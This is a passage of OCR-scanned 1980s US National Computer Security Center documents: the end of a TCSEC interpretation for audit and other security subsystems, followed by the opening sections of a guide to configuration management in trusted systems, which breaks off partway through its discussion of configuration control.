The following subsections provide interpretations of the TCSEC requirements which shall be satisfied by auditing subsystems at AUD/D2. 
2.4.3.1.1 Creation and management of audit trail
The auditing subsystem shall create and manage the audit trail of security-relevant " events in the system. If the other portions of the system are unable to capture data about such events, the auditiug subsystem shaU coutain the necessary interfaces into the system to perform this function. Alternatively, the auditing subsystem might simply accept and store data about events if the other portions of the system are capable of creating such data and passing them on. 
Rationale/Discussion: 
To meet this requirement, it is sufficient that the audit subsystem provides a set of calls which permit the system to supply the needed data as parameters that the audit subsystem puts into a data structure and routes to audit storage (or transmits securely to an audit logger). 
2.4.3.1.2 Protection of audit data
It shall be demonstrated that the audit data is protected from unauthorized modification. This protection will be provided either by the subsystem itself or by its integration with the protected system. 
Rationale/Discussion: 
The auditing subsystem might store the audit data in a dedicated data storage area that cannot be accessed by any subject on the system except the auditing subsystem itself and the system security officer (or system administrator through the auditing subsystem. Or, if the protected system has adequate access control facilities, the audit data might be stored on the protected system, using its access control mechanisms for protection. 
2.4.3.1.3 Access control to audit
The audit mechanism, auditing parameters, and the audit data storage media shall be protected to ensure access is allowed only to authorized individuals. Individuals who are authorized to access the audit data shall be able to gain access only through the auditing subsystem. 
Rationale/Discussion: 
This interpretation assumes that discretionary access controls or physical controls will be in place to keep unauthorized individuals from gaining access to the audit data. 
2.4.3.1.4 Specific types of events
Data about all security relevant events must be recorded. The other portions of the system shall be able to pass data concerning these events to the auditing subsystem, or the auditing subsystem shall have the necessary code integrated into the other portions of the system to pass the data to the collection point. 
2.4.3.1.5 Specific infolmation per event
All of the specific information enumerated in the TCSEC quote shall be captured for each recorded event. Of particular concern, is the recording of the user identity with each recorded event. 
Rationale/Discussion: 
This implies that the audit subsystem must be able to acquire user identities from an I&A mechanism, which may be provided on the audit subsystem itself, on the protected system, or in a separate I&A subsystem. Whichever is the case, the evaluation shall show that the audit subsystem has a working interface to an I&A mechanism. 
2.4.3.1.6 Ability to selectively audit individuals
The auditing subsystem shall have the ability to perform selection of audit data based on individual users. 
Rationale/Discussion: 
This requirement can be satisfied by pre-selection of the information to be recorded in the audit log (selective logging) and/or by post-selection of information to be extracted from the audit log (selective reduction). The reduction of the audit log must be able to show all of the security-relevant actions performed by any specified individual. The intent of selective logging is to reduce the volume of audit data to be recorded by only recording audit data for those specific individuals that the systcm security officer (or system administrator) specifies. The intent of selective reduction is to reduce the large volume of audit data into a collection of intelligible information which can be more efficiently used by the system administrator. 
2.4.3.2 AUD/D3
· TCSEC Quote: 
"B3: Add: The TCB shal~ contain a mechanism that is able to monitor the occurrence or accumulation of security auditable events that may indicate an imminent violation of security policy. This mechanism shall be able to immediately notify the security administrator when thresholds are exceeded and, if the occurrence or accumulation of these securib relevant events continues, the system shall take the least disruptive action to terminate the event." 
· Interpretation: The following interpretation, in addition to the interpretation and requirement for AUD/D2, shall be satisfied for the AUD/D3 class. 
2.4.3.2.1 Real-time alarms
The auditing subsystem shall provide the capability for the security administrator to set thresholds for certain auditable events. Furthermore, when the thresholds are exceeded, the audit subsystem shall immediately notify the security administrator of an imminent security violation. 
2.4.4 Assurance Requirements for Auditing Subsystems
Audit subsystems, whether being evaluated at AUD/D2 or AUD/D3, must comply with the assurance requirements listed below for the D2 class. The interpretations for these assurance requirements are contained in Section 3. 
· System Architecture (D2) 
· System Integrity (D2) 
· Security Testing (D2) 
2.4.5 Documentation Requirements for Auditing Subsystems
Audit subsystems, whether being evaluated at AUD/D2 or AUD/D3, must meet the documentation requirements listed below for the D2 class. The interpretations for these documentation requirements are contained in Section 4. 
· Security Features User's Guide (D2) 
· Trusted Facility Manual (D2) 
· Test Documentation (D2) 
· Design Documentation (D2) 
3. ASSURANCE REQUIREMENTS
Rated subsystems must provide correct and accurate operations. Assurance must be provided that correct implementation and operation of the subsystem's function exist throughout the subsystem's life cycle. The objective in applying these assurance requirements is to develop confidence that the subsystem has been implemented correctly and that it is protected from tampering and circumvention. 
The requirement is that the subsystem must contain hardware/software mechanisms that can be independently evaluated through a combination of inspection and testing to provide sufficient assurance that the subsystem features enforce or support the functions for which the subsystem is intended. To receive a rating, a subsystem must meet the assurance requirements at the same level of trust as it has I met the requirements for functionality. The assurances must be applied to the different types of subsystems as described in the previous sections. 
3.1 SUBSYSTEM ARCHITECTURE
Subsystem architecture evaluation is designed to provide operational assurances with regard to the design and implementation of the protection mechanisms of the subsystem and its interfaces to the host/host TCB. 
3.1.1 Arch:D1
TCSEC Quote: 
"Cl: New: The TCB shall maintain a domain for its own execution that protects it from external interference or tampering (e.g., by modification of its code or data structures). Resources controned by the TCB may be a defined subset of the subjects and objects in the ADP system." 
Interpretation: 
This requirement applies to all subsystems evaluated at all classes, regardless of the function(s) they perform. There are two specific elements of this requirement: Execution Domain Protection and Defined Subsets. 
3.1.1.1 Execution Domain Protection
Protection of the subsystem's mechanism and data from external interference or tampering must be provided. The code and data of the subsystem may be protected' through physical protection (e.g., by the subsystem's dedicated hardware base) or by 
logical isolation (e.g., using the protected system's domain mechanism). 
Rationale and Discussion: 
The subsystem may be contained entirely on its own hardware base which must protect the operational elements of the mechanisms. Alternatively, all or a portion of the subsystem may be implemented on the hardware of the host, in which case the host system's architecture must protect this portion from external interference or tampering. 
3.1.1.2 Defined Subsets
I&A subsystems, when used for the system's I&A, define the subset of subjects under the control of the system's TCB. DAC subsystems may protect a subset of the total collection of objects on the protected system. 
3.1.2 Arch:D2
TCSEC Quotes: 
"C2: Add: The TCB shall isolate the resources to be protected so that they are subject to the access control and auditing requirements." 
Interpretation: 
In the TCSEC quote, "TCB" is interpreted to mean "subsystem". 
This requirement applies to all subsystems evaluated at the D2 class or the D3 class. The following interpretations explain how this requirement applies to specific functions performed by subsystems. 
· Interpretation for DAC Subsystems: 
All named objects which are in the defined subset of protected objects shall be isolated such that the DAC subsystem mediates all access to those objects. 
· Interpretation for Auditing Subsystems: 
The system's architecture shall ensure that the auditing mechanism cannot be bypassed by any subjects accessing those objects under the system's control. 
· Interpretation for Object Reuse Subsystems 
The notion of subsetting objects is not applicable to object reuse subsystems. Object reuse subsystems shall perform their function for all storage objects on the protected system that are accessible to users. 
· Interpretation for I&A Subsystems: 
This requirement applies to I&A subsystems. Authentication data shall be protected from unauthorized access. Access to the authentication data shall also be recorded in the audit trail. 
3.2 SUBSYSTEM INTEGRITY
Subsystem integrity evaluation is designed to provide operational assurances with regard to the correct operation of the protection mechanisms of the subsystem and its interfaces to the protected system. 
3.2.1 Integity:D1
TCSEC Quote 
"Cl: New: Hardware and/or software features shan be provided that can be used to periodicany ~aUdate the correct operation of the on site hardware and firmware elements of the TCB." 
Interpretation: 
In the TCSEC quote, "TCB" is interpreted to mean "subsystem". 
This requirement applies to an subsystems evaluated at any class, regardless of the functions they perform. 
Rationale/Discussion 
The capability must exist to validate the correct operation of all hardware and firrnware elements of the system regardless of whether they reside within the subsystem, the protected system, or other interfacing subsystems. If the hardware and/or firmware elements of the protected system or other interfacing subsystems play an integral role in the protection and/or correct operation of the subsystem, then they must comply with this requirement as though they were part of the subsystem. 
3.2.2 Integrity:D2
There are no additional requirements for System Integrity at D2. 
3.3 SECURITY TESTING
Testing, as part of the evaluation, is designed to provide life cycle assurances with regard to the integrity of the subsystem. Further, testing provides additional assurances regarding the correct operation of the protection mechanisms of the subsystem and the subsystem's interfaces to the protected system. These mechanisms and their interfaces to the protected system, are termed the Subsystem's Security- Relevant Portion (SRP). 
3.3.1 Test:Dl
TCSEC Quote: 
"Cl: New: The securib mechanisms of the ADP system shan be tested and found to work as claimed in the system documentation. Testing shan be done to assure that there are no ob~ious ways for an unauthorized wer to bypass or otherwise defeat the security protection mechanisms of the TCB. (See the Security Testing Guidelines.) " 
Interpretation 
This requirement applies to all subsystems evaluated at any class, regardless of the function(s) they perform. In the TCSEC quote, "TCB" is interpreted to mean subsystem. 
The subsystem's SRP shall be tested and found to work as claimed in the subsystem's documentation. The addition of a subsystem to a protected system shall not cause obvious flaws to the resulting system. _ 
Test results shall show that there are no obvious ways for an unauthorized user to bypass or otherwise defeat the subsystem's SRP. 
Rational/Discussion: 
Security testing is a very important part of subsystem evaluations. It is essential that the subsystem be demonstrated to operate securely. 
3.3.2 Test:D2
TCSEC Quote: 
"C2: Add: Testing shan also include a search for obvious flaws that would anow nolation of resource isolation, or that would permit unauthorized access to the audit or authentication data." 
Interpretation: 
This requirement applies to the testing of the SRP of any subsystem evaluated at the D2 class or the D3 class. 
Rationale/Discussion 
The requirement as written in the TCSEC quote is directly applicable. This requirement is to ensure that subsystems at D2 cannot be circumvented or tampered with. 
4. DOCUMENTATION REQUIREMENTS
Documentation shan produce evidence that the subsystem can and does provide specified security features. The evaluation will focus on the completeness of this evidence through inspection of documentation structure and content and through a mapping of the documentation to the subsystem's implementation and its operation. 
4.1 SECURITY FEATURES USER'S GUIDE
4.1.1 SFUG:Dl
TCSEC Quote: 
"Cl: New: A single summaIy, chapter, or manual in user documentation shall describe the protection mechanisms provided by the TCB, guidelines on their use, and how they interact with one another." 
Interpretation: 
All subsystems shall meet this requirement in that they shall describe the protection mechanisms provided by the subsystem. 
Rationale/Discussion: 
It is recognized that some subsystems may be partially or completely transparent to the general user. In such cases, this requirement can be met by documenting the functions the subsystem performs so users will be aware of what the subsystem does. Other subsystems which have a very limited user interface may not need to be accompanied by more than a pocketsize card available to every user. In short, the documentation required to meet this requirement need not be elaborate, but must be clear and comprehenslve. 
4.1.2 SFUG:D2
Interpretation: 
There are no additional requirements at the D2 class. 
4.2 TRUSTED FACILITY MANUAL
4.2.1 TFM:Dl
TCSEC Quote : 
"Cl: New: A manual addressed to the ADP system admmistrator shan present cautions about functions and prvileges that should be controlled when running a secure facility." 
Interpretation: 
This requirement applies to all subsystems in that the manual shall present cautions about functions and privileges provided by the subsystem. Further, this manual shall present specific and precise direction for effectively integrating the subsystem into the overall system. 
4.2.2 TFM:D2
TCSEC Quote: 
"C2: Add: The procedures for examining and maintaMing the audit files as well as the detailed audit record structure for each type of audit event shall be given." 
Interpretation: 
This requirement applies directly to all auditing subsystems and to other subsystems that maintain their own audit data concerning events that happen under their control. For subsystems that create audit data and pass it to an external auditing collection and maintenance facility, the audit record structure shall be documented; however, the procedures for examination and maintenance of audit files may be left to the external auditing facility. 
4.3 TEST DOCUMENTATION
4.3.1 TD:Dl
TCSEC Quote: 
"Cl: New: The system developer shall provide to the evaluators a document that describes the test plan, test procedures that show how the securib mechanisms were tested, and results of the security mechanisms' functional testing." 
Interpretation: 
The document shall explain the exact configuration used for security testing. All mechanisms supplying the required supporting functions shall be identified. All interfaces between the subsystem being tested, the protected system, and other subsystems shall be described. 
4.3.2 TD:D2
Interpretation 
There are no additional requirements at the D2 class. 
4.4 DESIGN DOCUMENTATION
4.4.1 DD:Dl
TCSEC Quote: 
"Cl: New: Documentation shall be available that provides a description of the manufacturer's philosophy of protection and an explanation of how this philosophy is translated into the TCB. If the TCB is composed of distinct modules, the interfaces between these modules shall be described. " 
Interpretation: 
This requirement applies directly to all subsystems. Specifically, the design documentation shall state what types of threats the subsystem is designed to protect against (e.g., casual browsing, determined attacks, accidents). This documentation shan show how the protection philosophy is translated into the subsystem's SRP. Design documentation shan also specify how the subsystem is to interact with the protected system and other subsystems to provide a complete computer security system. If the SRP is modularized, the interfaces between these modules shall be described. 
4.4.2 DD:D2
There are no additional requirements for Design Documentation at the D2 class. 
5- GLOSSARY
Accreditation - The offlcial authorization that is granted to an ADP system to process sensitive information in its operational environment, based upon , comprehensive security evaluation of the system's hardware, firmware, and software . security design, configuration and implementation of the other system procedural, administrative, physical, TEMPEST, personnel, and comrnunications controls. 
Audit - The procedure of capturing, storing, maintaining, and managing data concerning security-relevant events that occur on a computer system. The data recorded are intended for use in detecting security violations and tracing thosc violations to the responsible individual. 
Audit trail - A set of records that collectively provide documentary evidence of processing users to aid in tracing from original transactions forward to related records and reports, and/or backwards from records and reports to their component source transactions. 
Authenticate - To establish the validity of a claimed identity. 
Authorization - Permission which establishes right to access information. 
Certification evaluation - The technical evaluation of a system's security features, made as part of and in support of the approval/accreditation process, that establishes " the extent to which a particular computer system's design and implementation meet a set of specified security requirements. 
Computer security subsystem - Hardware, firmware and/or software which are added to a computer system to enhance the security of the overall system. 
Group user - A user of a computer system whose system identification is the name of a defined group of users on that system. 
Individual user - A user of a computer system whose system identification is unique, in that no other user on that system has that same identification. 
Named object - An object which is directly manipulable at the TCB interface. Thc object must have meaning to more than one process. 
Product evaluation - Thc technical evaluation of a product's security features to determine the level of trust that can be placed in that product as defined by thc NCSC. evaluation criteria for that type of product (e.g., operating system, database management system, computer network, computer security subsystem). Product evaluations do not consider the application of the product in the evaluation. 
Protected system - The system being protected. In the context of computer security subsystems, a stand-alone computer system or a computer network to which a subsystem is attached to pronde some computer security function. 
Security Relevant Portion (SRP) - The protection-critical mechanism of the subsystem, the subsystem's interface(s) to the protected system, and interfaces to the mechanisms providing required supporting functions. For most cases, the SRP encompasses the entire subsystem. 
Subsystem - See "computer security subsystem." 
System - The combination of the protected system and the computer security subsystem. 
*U.S. GOVERNMENT PRINTING OFFICE: 1989-225-703

National Computer Security Center: A Guide to Understanding Configuration Management in Trusted Systems

 

                        NATIONAL COMPUTER

                         SECURITY CENTER

                           A GUIDE TO

                          UNDERSTANDING

                     CONFIGURATION MANAGEMENT

                        IN TRUSTED SYSTEMS

                                            NCSC-TG-006-88
                                     Library No. S-228,590

                           FOREWORD

This publication, "A Guide to Understanding Configuration
Management in Trusted Systems", is being issued by the National
Computer Security Center (NCSC) under the authority of and in
accordance with Department of Defense (DoD) Directive 5215.1. The
guidelines described in this document provide a set of good
practices related to configuration management in Automated Data
Processing (ADP) systems employed for processing classified and
other sensitive information.  Recommendations for revision to
this guideline are encouraged and will be reviewed biannually by
the National Computer Security Center through a formal review
process.  Address all proposals for revision through appropriate
channels to:

       National Computer Security Center
       9800 Savage Road
       Fort George G. Meade, MD  20755-6000

       Attention: Chief, Computer Security Technical Guidelines

____________________________
Patrick R. Gallagher, Jr.                        28 March 1988
Director
National Computer Security Center

                                i

                        ACKNOWLEDGEMENTS

Special recognition is extended to James N. Menendez, National
Computer Security Center (NCSC), as project manager and primary
author of this document.

Special acknowledgement is given to Grant Wagner, NCSC, and Dana
Nell Stigdon, NCSC, for their constant help and guidance in the
production of this document.  Additionally, Dana Nell Stigdon,
was responsible for writing the section on the Ratings
Maintenance Program.  Acknowledgement is also given to all those
members of the computer security community who contributed their
time and expertise by actively participating in the review of
this document.

                                ii

                            CONTENTS

FOREWORD ....................................................  i

ACKNOWLEDGEMENTS ............................................ ii

CONTENTS .................................................... iii

PREFACE .....................................................  v

1.  PURPOSE .................................................  1

2.  SCOPE ...................................................  1

3.  CONTROL OBJECTIVES ......................................  2

4.  ORGANIZATION ............................................  3

5.  OVERVIEW OF CONFIGURATION MANAGEMENT PRINCIPLES .........  4

    5.1  PURPOSE OF CONFIGURATION MANAGEMENT ................  4

6.  MEETING THE CRITERIA REQUIREMENTS .......................  5

    6.1  THE B2 CONFIGURATION MANAGEMENT REQUIREMENTS .......  5
    6.2  THE B3 CONFIGURATION MANAGEMENT REQUIREMENTS .......  6
    6.3  THE A1 CONFIGURATION MANAGEMENT REQUIREMENTS .......  6

7.  FUNCTIONS OF CONFIGURATION MANAGEMENT ...................  7 

    7.1  CONFIGURATION IDENTIFICATION .......................  7
         7.1.1  Configuration Items .........................  8

    7.2  CONFIGURATION CONTROL ..............................  10
    7.3  CONFIGURATION STATUS ACCOUNTING ....................  11 
    7.4  CONFIGURATION AUDIT ................................  12

8.  THE CONFIGURATION MANAGEMENT PLAN .......................  14

9.  IMPLEMENTATION METHODS ..................................  16

    9.1  THE BASELINE CONCEPT ...............................  16
    9.2  CONFIGURATION MANAGEMENT AT MER, INC. ..............  18
    9.3  THE CONFIGURATION CONTROL BOARD ....................  20

10. OTHER TOPICS ............................................  23

   10.1  TRUSTED DISTRIBUTION ...............................  23 
   10.2  FUNCTIONAL TESTING .................................  24 
   10.3  CONFIGURATION MANAGEMENT TRAINING ..................  24

                               iii

   10.4  CONFIGURATION MANAGEMENT SUPERVISION ...............  25

11. RATINGS MAINTENANCE PROGRAM .............................  26

12. CONFIGURATION MANAGEMENT SUMMARY  .......................  27

APPENDIX A: AUTOMATED TOOLS .................................  29

    A.1  UNIX (1) SCCS ......................................  29
    A.2  VAX DEC/CMS ........................................  30

GLOSSARY ....................................................  32

REFERENCES ..................................................  34

(1)  Unix is a registered trademark of Bell Laboratories

                                iv

                            PREFACE

Throughout this guideline there will be recommendations made that
are not included in the Trusted Computer System Evaluation
Criteria (TCSEC) as requirements.  Any recommendations that are
not in the TCSEC will be prefaced by the word "should," whereas
all requirements will be prefaced by the word "shall."  It should
be noted that a TCSEC rating will only be based upon meeting the
TCSEC requirements.  Recommendations are made in order to provide
additional ways of increasing assurance.  It is hoped that this
will help to avoid any confusion.

                                v

1.  PURPOSE

The Trusted Computer System Evaluation Criteria (TCSEC) is the
standard used for evaluating the effectiveness of security
controls built into ADP systems.  The TCSEC is divided into four
divisions: D, C, B, and A, ordered in a hierarchical manner with
the highest division, A, being reserved for systems providing the
best available level of assurance.  Within divisions C through A
are a number of subdivisions known as classes, which are also
ordered in a hierarchical manner to represent different levels of
security in these classes.

For TCSEC classes B2 through A1, the TCSEC requires that all
changes to the Trusted Computing Base (TCB) be controlled by
configuration management.  Configuration management of a trusted
system consists of identifying, controlling, accounting for, and
auditing all changes made to the TCB during its development,
maintenance, and design.  The primary purpose of this guideline
is to provide guidance to developers of trusted systems on what
configuration management is and how it may be implemented in the
development and life-cycle of a trusted system.  This guideline
has also been designed to provide guidance to developers of all
systems on the importance of configuration management and how it
may be implemented.

Examples in this document are not to be construed as the only
implementation that will satisfy the TCSEC requirement.  The
examples are merely suggestions of appropriate implementations. 
The recommendations in this document are also not to be construed
as supplementary requirements to the TCSEC.  The TCSEC is the
only metric against which systems are to be evaluated.

This guideline is part of an on-going program to provide helpful
guidance on TCSEC issues and the features they address.  

2.  SCOPE

An important security feature of TCSEC classes B2 through A1 is
that there be configuration management procedures to manage
changes to the Trusted Computing Base (TCB) and all of the
documentation and tests affected by these changes.  Additionally,
it is recommended that such plans and procedures exist for
systems not being considered for an evaluation or whose target
evaluation class may be less than B2.  The assurance provided by
configuration management is beneficial to all systems.  This
guideline will discuss configuration management and its features
as they apply to computer systems and products, with specific
attention being given to those that are being built with the 

                                1

intention of meeting the requirements of the TCSEC, and to those
systems planning to be re-evaluated under the Ratings Maintenance
Program (RAMP) (see Section 11. RAMP).

Except in cases where there is a distinction between the
configuration management of a trusted system and an untrusted
system, the word "system" shall be used as the object of
configuration management, encompassing both the system and the
TCB.  It should be noted that the TCSEC only requires the TCB to
be controlled by configuration management, although it is
recommended that the entire system be maintained under
configuration management.

3.  CONTROL OBJECTIVES

The TCSEC gives the following as the Assurance Control Objective:

    "Systems that are used to process or handle classified or    
    other sensitive information must be designed to guarantee    
    correct and accurate interpretation of the security policy   
    and must not distort the intent of that policy.  Assurance   
    must be provided that correct implementation and operation   
    of the policy exists throughout the system's life-cycle."[1]

Configuration management maintains control of a system throughout
its life-cycle, ensuring that the system in operation is the
correct system, implementing the correct security policy.  The
Assurance Control Objective as it relates to configuration
management leads to the following control objective that may be
applied to configuration management: 

    "Computer systems that process and store sensitive or        
    classified information depend on the hardware and software   
    to protect that information.  It follows that the hardware   
    and software themselves must be protected against            
    unauthorized changes that could cause protection mechanisms  
    to malfunction or be bypassed completely.  [For this         
    reason, changes to trusted computer systems, during their    
    entire life-cycle, must be carefully considered and          
    controlled to ensure that the integrity of the               
    protection mechanism is maintained.]  Only in this way can   
    confidence be provided that the hardware and software        
    interpretation of the security policy is maintained          
    accurately and without distortion."[1]

                                2

4.  ORGANIZATION

This document has been written to provide the reader with an 
understanding of what configuration management is and how it may
be implemented in an ADP system.

For developers of trusted systems, this document also relates the
TCSEC requirements to the configuration management practices that
meet them.  This document has been organized to illustrate the
connection between practices and requirements through the use of
a numbering convention for the TCSEC requirements.  The
configuration management requirements have been broken down into
19 separate requirements in Section 6 of this document.  The
requirement number(s) will be located in parenthesis following
its appropriate discussion, e.g., (Requirements 2, 15), signifies
that the previous discussion dealt with TCSEC requirements 2 and
15 as stated in Section 6. 

                                3

5.  OVERVIEW OF CONFIGURATION MANAGEMENT PRINCIPLES

Configuration management consists of four separate tasks:
identification, control, status accounting, and auditing.  For
every change that is made to an automated data processing (ADP)
system, the design and requirements of the changed version of the
system should be identified.  The control task of configuration
management is performed by subjecting every change to
documentation, hardware, and software/firmware to review and
approval by an authorized authority.  Configuration status
accounting is responsible for recording and reporting on the
configuration of the product throughout the change.  Finally,
through the process of a configuration audit, the completed
change can be verified to be functionally correct, and for
trusted systems, consistent with the security policy of the
system.  Configuration management is a sound engineering practice
that provides assurance that the system in operation is the
system that is supposed to be in use.  The assurance control
objective as it relates to configuration management of trusted
systems is to "guarantee that the trusted portion of the system
works only as intended."[1]

Procedures should be established and documented by a
configuration management plan to ensure that configuration
management is performed in a specified manner.  Any deviation
from the configuration management plan could contribute to the
failure of the configuration management of a system entirely, as
well as the trust placed in a trusted system. 

5.1  Purpose of Configuration Management

Configuration management exists because changes to an existing
ADP system are inevitable.  The purpose of configuration
management is to ensure that these changes take place in an
identifiable and controlled environment and that they do not
adversely affect any properties of the system, or in the case of
trusted systems, do not adversely affect the implementation of
the security policy of the TCB.   Configuration management
provides assurance that additions, deletions, or changes made to
the TCB do not compromise the trust of the originally evaluated
system.  It accomplishes this by providing procedures to ensure
that the TCB and all documentation are updated properly.  

                                4

6.  MEETING THE CRITERIA REQUIREMENTS

This section lists the TCSEC requirements for configuration
management.  Each requirement for each class has been listed
separately and numbered.  Each number may be referenced to the
requirement discussions that follow in this document.  This
section is designed to serve as a quick reference for TCSEC class
requirements.

6.1  The B2 Configuration Management Requirements

Requirement 1 - "During development and maintenance of the TCB, a
configuration management system shall be in place."[1]

Requirement 2 - The configuration management system shall
maintain "control of changes to the descriptive top-level
specification (DTLS)."[1]

Requirement 3 - The configuration management system shall
maintain control of changes to "other design data."[1]

Requirement 4 - The configuration management system shall
maintain control of changes to "implementation documentation"[1]
(e.g., user's manuals, operating procedures).

Requirement 5 - The configuration management system shall
maintain control of changes to the "source code."[1]

Requirement 6 - The configuration management system shall
maintain control of changes to "the running version of the object
code."[1]

Requirement 7 - The configuration management system shall
maintain control of changes to "test fixtures."[1]

Requirement 8 - The configuration management system shall
maintain control of changes to test "documentation."[1]

Requirement 9 - "The configuration management system shall assure
a consistent mapping among all documentation and code associated
with the current version of the TCB."[1]

Requirement 10 - The configuration management system shall
provide tools "for generation of a new version of the TCB from
the source code."[1]

Requirement 11 - The configuration management system shall
provide "tools for comparisons of a newly generated TCB version 

                                5

with the previous version in order to ascertain that only the 
intended changes have been made in the code that will actually be
used as the new version of the TCB."[1]                          

6.2  The B3 Configuration Management Requirements

The requirements for configuration management at TCSEC class B3
are the same as the requirements for TCSEC class B2. Although no
additional requirements have been added, the configuration
management system shall change to reflect changes in the design
documentation requirements at class B3.  This means that the
additional documentation required for TCSEC class B3 shall also
be maintained under configuration management.

6.3  The A1 Configuration Management Requirements

Requirements 2 through 11 are the same as those described in
Section 6.1 for a class B2 rating.  In addition the following
requirements are added for class A1:

Requirement 12 - "During the entire life-cycle, i.e., during the
design, development, and maintenance of the TCB, a configuration
management system shall be in place for all security-relevant
hardware, firmware, and software."[1]

Requirement 13 - The configuration management system shall
maintain control of changes to the TCB hardware.

Requirement 14 - The configuration management system shall
maintain control of changes to the TCB software.

Requirement 15 - The configuration management system shall
maintain control of changes to the TCB firmware.

Requirement 16 - The configuration management system shall
"maintain control of changes to the formal model."[1]

Requirement 17 - The configuration management system shall
maintain control of changes to the "formal top-level
specifications."[1]

Requirement 18 - The tools available for configuration management
shall be "maintained under strict configuration control."[1]

Requirement 19 - "A combination of technical, physical, and
procedural safeguards shall be used to protect from unauthorized
modification or destruction the master copy or copies of all
material used to generate the TCB."[1]

                                6

7.  FUNCTIONS OF CONFIGURATION MANAGEMENT

7.1  Configuration Identification

Configuration management procedures should enable a person to
"identify the configuration of a system at discrete points in
time for the purpose of systematically controlling changes to the
configuration and maintaining the integrity and traceability 
of this configuration throughout the system life cycle."[4]  The 
basic function of configuration identification is to identify the
components of the design and implementation of a system.  When it
concerns trusted systems, this specifically means the design and
implementation of the TCB.  This task may be accomplished through
the use of identifiers and baselines (see Section 9.1  The
Baseline Concept).  By establishing configuration items and
baselines, the configuration of the system and its TCB can be
accurately identified throughout the system life-cycle.  

At TCSEC class B2, the TCSEC requires that "changes to the
descriptive top-level specification, other design data,
implementation documentation, source code, the running version of
the object code, and test fixtures and documentation"[1] of the
TCB be controlled by configuration management (Requirements 2, 3,
4, 5, 6, 7, 8).  Configuration identification helps achieve this
control.  The TCSEC requires that each change to the TCB shall be
individually identifiable so that a history of the TCB may be
generated at any time.  At TCSEC class A1, the requirements are
extended to include that the "formal model...and formal top-level
specifications" of the TCB shall also be maintained under the
configuration management system (Requirements 16, 17).  

The following is a sample list of what shall be identified and
maintained under configuration management:

   * the baseline TCB including hardware, software, and firmware

   * any changes to the TCB hardware, software, and firmware     
     since the previous baseline

   * design and user documentation

   * software tests including functional and system integrity    
     tests

   * tools used for generating current configuration items       
     (required at TCSEC class A1 only)

Configuration management procedures should make it possible to
accurately reproduce any past TCB configuration.  In the event a 

                                7

security vulnerability is discovered in a version of the TCB
other than the most current one, analysts will need to be able to
reconstruct the past environment.  This reconstruction will be
possible to perform if proper configuration identification has
been performed throughout the system life-cycle.  

The TCSEC also requires at class B2 and above, that tools shall
be provided "for generation of a new version of the TCB from the
source code" and that there "shall be tools for comparing a newly
generated version with the previous TCB version in order to
ascertain that only the intended changes have been made in the
code that will actually be used as the new version of the TCB"[1]
(Requirements 10, 11).  These tools are responsible for providing
assurance that no additional changes have been inserted into the
TCB that were not intended by the system designer.  Automated
tools are available that make it possible to identify changes to
a system online (see APPENDIX A: AUTOMATED TOOLS).  Any changes,
or suggested changes to a system should be entered into an online
library.  This data can later be used to compare any two versions
of a system.  Such online configuration libraries may even
provide the capability for line-by-line comparison of software
modules and documentation.  At Class A1, the tools used to
perform this function shall be "maintained under strict
configuration control"[1] (Requirement 18).  These tools shall
not be changed without having to undergo a strict review process
by an authorized authority.

7.1.1  Configuration Items

A configuration item is an uniquely identifiable subset of the
system configuration that represents the smallest portion of the
system to be subject to independent configuration management
change control procedures.   Configuration items need to be
individually controlled because any change to a configuration
item may have some effect upon the properties of the system or
the security policy of the TCB.  

Configuration items as they relate to the TCB, are subsets of the
TCB's hardware, firmware, software, documentation, tests, and at
class A1, development tools.  Each module of TCB software for
example, may constitute a separate configuration item. 
Configuration items should be assigned unique identifiers (e.g.,
serial numbers, names) to make them easier to identify throughout
the system life-cycle.  Proper identification plays a vital role
in meeting the TCSEC requirement for class B2 that requires the
configuration management system to "assure a consistent mapping
among all documentation and code associated with the current
version of the TCB"[1] (Requirement 9).  Used in conjunction with

                                8

a configuration audit, a consistent labeling system helps tie
documentation to the code it describes.  Not only does labeling
each configuration item make them easier to identify, but it also
increases the level of control that may be maintained over the
entire system by making these items more traceable.    

Configuration items may be given an identifier through a random
distribution process, but, it is more useful for the
configuration identifier to describe the item it identifies. 
Selecting different fields of the configuration identifier to
represent characteristics of the configuration item is one method
of accomplishing this.  The United States Social Security number
is a "configuration identifier" we all have that uses such a
system.  The different fields of the number identify where we
applied for the Social Security card, hence describing a little
bit about ourselves.   As the configuration identifier relates to
computer systems, one field should identify the system version
the item belongs to, the version of software that it is, or its
interface with other configuration items.   When using a
numbering scheme like this, a change to a configuration item
should result in the production of a new configuration
identifier.  This new identifier should be produced by an
alteration or addition to the existing configuration identifier. 
A new version of a software program should not be identified by
the same configuration item number as the original program.  By
treating the two versions as distinct configuration items, line-
by-line comparisons are possible to perform.  

Identifying configuration items is a task that should be
performed early in the development of the system, and once
something is designated as a configuration item, the design 
of that item should not change without the knowledge and 
permission of the party controlling the item.  Early
identification of configuration items increases the level of
control that may be maintained over the item and allows the item
to be traced back through all stages of the system development. 
In the event that a configuration item is not identified until
late in the development process, accountability for that item in
the early stages of the system development would be non-existent.

Configuration items may vary widely in complexity, size, and
type, and it is important to choose configuration items with 
appropriate granularity.  If the items are too large, the data
identifying each one will overwhelm anyone trying to audit the
system.  If the items are too small, the amount of total 
identification data will overwhelm the system auditors.[2]  The
appropriate granularity for configuration items should be
identified by each vendor and documented in the configuration
management plan.

                                9

7.2  Configuration Control

"Configuration control involves the systematic evaluation,
coordination, approval, or disapproval of proposed changes to the
design and construction of a configuration item whose
configuration has been formally approved."[5]  Configuration
control should begin in the earliest stages of the design and 
development of the system and extend over the full life of the
configuration items included in the design and development
stages.  Early initiation of configuration control procedures
provides increased accountability for the system by making its
development more traceable.  The traceability function of
configuration control serves a dual purpose.  It makes it
possible to evaluate the impact of a change to the system and
controls the change as it is being made.  With configuration
control in place, there is less chance of making undesirable
changes to a system that may later adversely affect the security
of the system.

Initial phases of configuration control are directed towards
control of the system configuration as defined primarily in
design documents.  For these, the Configuration Management plan
shall specify procedures to ensure that all documentation is
updated properly and presents an accurate description of the
system and TCB configuration.  Often a change to one area of a
system may necessitate a change to another area.   It is not
acceptable to only write documentation for new code or newly
modified code, but rather documentation for all parts of the TCB
that were affected by the addition or change shall be updated
accordingly.  Although documentation may be available, unless it
is kept under configuration management and updated properly it
will be of little, if any use.  In the event that the system is
found to be deficient in documentation, efforts should be made to
create new documentation for areas of the system where it is
presently inadequate or non-existent.                            

To meet the TCSEC requirements though, configuration control
shall cover a broader area than just documentation, and at Class
B2 shall also maintain control of "design data, source code, the
running version of the object code, and test fixtures"[1] of the
TCB (Requirements 3, 5, 6, 7).  A change to any of these shall be
subject to review and approval by an authorized authority.  

